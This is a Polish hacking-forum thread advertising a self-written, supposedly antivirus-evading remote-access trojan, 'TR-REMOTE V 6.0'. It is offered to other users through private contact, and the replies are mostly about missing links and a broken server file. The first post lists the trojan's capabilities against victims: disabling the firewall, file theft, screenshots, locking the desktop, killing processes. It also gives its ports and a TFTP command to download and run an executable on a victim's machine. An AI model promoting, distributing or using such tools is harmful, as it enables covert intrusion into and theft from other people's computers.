TR-REMOTE V 6.0 niewykrywalny

[krzychu_haker]

Witam,

Mam tutaj na razie niewykrywalnego trojana na dzień
dzisiejszy niewykrywalny przez av. Wymaga zainstalowanego
NET Frameworka zarówno u ciebie jak i u ofiary.

Podczas instalacji trojan wyłącza systemowego firewalla.
Następnie przesyła nr IP ofiary na gg. Wklepujesz IP do klienta
i się łączysz.

Uwaga: Ofiara musi mieć osiągalne dla ciebie ip to znaczy

być w tej samej sieci co ty lub mieć publiczne IP

Trojan potrafi m. in.

- zapewnić ci dostęp do dysków
- robić zrzuty ekranu
- pobierać pliki od ofiary
- wysyłać (komenda TFTP w Shell/dos) przykład użycia poniżej
Przykładowo ściągamy i uruchamiamy plik exe u ofiary

TFTP -i twoje ip GET plik.exe C:wirus.exe
Start C:wirus.exe

- wysuwać / wsuwać CD
- wyłączać kompa, wylogowywać usera itp.
- pokazywać info o systemie
- pokazywać liste zadań
- killować procesy (użycie przez shell/dos)

Przykład zamyka explorera:

tskill explorer

albo

taskkill explorer

- wyświetlać komunikaty
- wyświetlić pytanie
- uruchamiać aplikacje z www
- podawać info o plikach / folderach
- blokować pulpit ofiary
- zamykać wszystkie aplikacje :glupek2:
- komendy dosa
a o nich temat http://www.haker.com.pl/forum/viewtopic.php?t=23705

Cały trojan został napisany w VB.NET Express. Używa Winsocka oraz GGSender'a. Nieźle się trzeba było namęczyć uff nareszcie gotowe

Porty których trojan używa to

9393 - port informacji

5421 - port screenshotów

2591 - port Shell/Dos

8561 - główny port

4561 - port p2p

Używany protokół to TCP.

Autorem trojanka jestem ja :faja:

Zanim się zdecydujesz przeczytaj:

Przestrzegam, że bezprawne uzyskanie informacji, naruszenie integralności komputerowego zapisu danych, podsłuch i sabotaż komputerowy, a prościej uszkodzenie, usunięcie zmianę danych, także zapoznanie się z treścią bezprawnie uzyskanych informacji jest karalne: art.267 § 1 k.k. art.267§ 

2art.268  § k.k. art.269 k.k.

Jest to jak narazie pierwsza wersja publiczna
mojego trojana. Zapraszam do dyskusji.

Screen:

Download: wyłączony - kontakt na gg

Pozdrawiam,
KILL

 

[TripleX]

Nie ma linka...Podpucha jakaś. Próbował to ktoś?

 

[krzychu_haker]

Originally posted by TripleX
Nie ma linka...Podpucha jakaś. Próbował to ktoś?

Chcesz linka to pogadaj na gg

 

[abramakabra]

Originally posted by krzychu_haker+--><div class='quotetop'>CYTAT(krzychu_haker)</div>

<!--QuoteBegin-TripleX

Nie ma linka...Podpucha jakaś. Próbował to ktoś?

Chcesz linka to pogadaj na gg[/b]

A Ty bywasz czasem na tym gg... ? ;]

 

[krzychu_haker]

;/

 

[CineX]

Ten link nie działa. Zapuść nowy!

 

[kinway]

czemu jak wygeneruje server ???? blokuje mi dojscia :hmmm: do neta ???? co to jest.... :hmmm:

 

[krzychu_haker]

Originally posted by kinway
czemu jak wygeneruje server ???? blokuje mi dojscia :hmmm: do neta ???? co to jest.... :hmmm:

Ale co się dokładnie dzieje ?? To właściwie niemożliwe... Chyba że serwer odpalisz

[ Dodano: 25-11-2006, 18:39 ]
Najnowsza niewykrywalna wersja dla 15 osób pisać na gg :killer:

 

[kinway]

Ale co się dokładnie dzieje ?? To właściwie niemożliwe... Chyba że serwer odpalisz





a jak wlasnie server odpalam to pssssss i mnie z gg wyrzuca z przegladarki itp itd wszystko jest zrobione bd

 

[krzycho]

Ten trojan już nie działa tzn.
Gdy wyśle komuś plik server to ona go otwiera i pojawia się komunikat:
"Niektóre plik nie mogły zostać utworzone.
Zamknij wszyskie aplikacje, uruchom ponownie Windows i ponów tą instalację"
A tej osobie przedtem działał ten server a później przestał działać
A nawet dzisiaj próbowałem uruchomić plik server na własnym kompie i pojawia się taki sam komunikat.
Czy ktoś może mi pomóc????????